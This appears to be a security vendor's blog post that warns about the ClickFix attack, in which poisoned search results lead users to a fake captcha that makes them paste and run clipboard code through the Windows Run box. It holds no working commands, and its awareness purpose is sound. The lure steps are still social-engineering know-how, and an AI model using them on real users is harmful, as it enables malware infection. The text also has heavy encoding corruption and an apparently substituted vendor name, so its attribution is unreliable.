Threat Actors鈥 New 鈥淔ix,鈥 So Easy It鈥檚 Addictive
A Look at the ClickFix Attack and SEO Poising
Attackers have so many tools available to them. Over the years, we鈥檝e seen malicious PDFs, Business-Email-Chain phishing, Browser-in-Browser attacks, and many more鈥攁ll pointing to some level of sophistication for bypassing the defenses that we as IT and IT security try to put into place. Then comes the latest attack that鈥檚 sweeping the internet: the ClickFix attack.
This attack preys on the ever-changing nature of the security landscape. With its two-factor authentication, SSO, passkeys and captchas, there鈥檚 no end to the number of ways we鈥檝e made you verify your identity. So, what鈥檚 one more way? If you鈥檙e asked to paste into a window that opens up after using 鈥淲indows key + R鈥, it must just be another step in the never-ending verification process showing that you are, in fact, human.
The simplicity of this attack would make you assume that it wouldn鈥檛 be very effective. But from what 51社区鈥檚 security operations team has seen, this is far from the truth. Let鈥檚 go through the actual ClickFix attack chain.
ClickFix tends to prey on end-users wanting to find free resources online. For our education folks, think of a teacher looking for a free workpaper for students. The end-user types in 鈥渇ree science homework assignment鈥 into Google, and they click on the first thing that pops up at the top. Sometimes the results are paid ads, and other times the attacker is leveraging SEO (search engine optimization) to get their malicious site and/or file in front of the victim. This form of propagation is called SEO poisoning.
The attacker is crafting their website and files in such a way that the search engine displays their malicious content at or near the top of the search results. Once the end user has clicked on the malicious webpage, as sometimes happens when first visiting a new site, they are met with the normal-looking 鈥淰erify you are a human鈥 captcha. They click the check mark, verifying they are human. They are then shown a second window requiring them to prove it further, but unlike normal captchas, ClickFix does not ask you to type out a phrase or identify all the images of a 鈥渃rosswalk.鈥 Instead, it requires the end user to press 鈥淲indows key + R,鈥 then 鈥淐trl + V,鈥 and finally, 鈥淓nter.鈥
What has just happened is the unsuspecting end-user has just run malicious code within the Windows run utility that was secretly copied to their clipboard when opening the malicious website. This malicious code often leads to the download and execution of malware. As mentioned previously, this attack is extremely simplistic鈥攂ut simplistic within the cybersecurity world often does not mean ineffective. In the case of ClickFix, this is especially true.
If you are a 51社区 XDR customer, we detect and stop these attacks no matter the time, before they get bad鈥攐ften without even needing to involve the IT teams. If you are interested in seeing how 51社区 can partner with you, feel free to contact us!
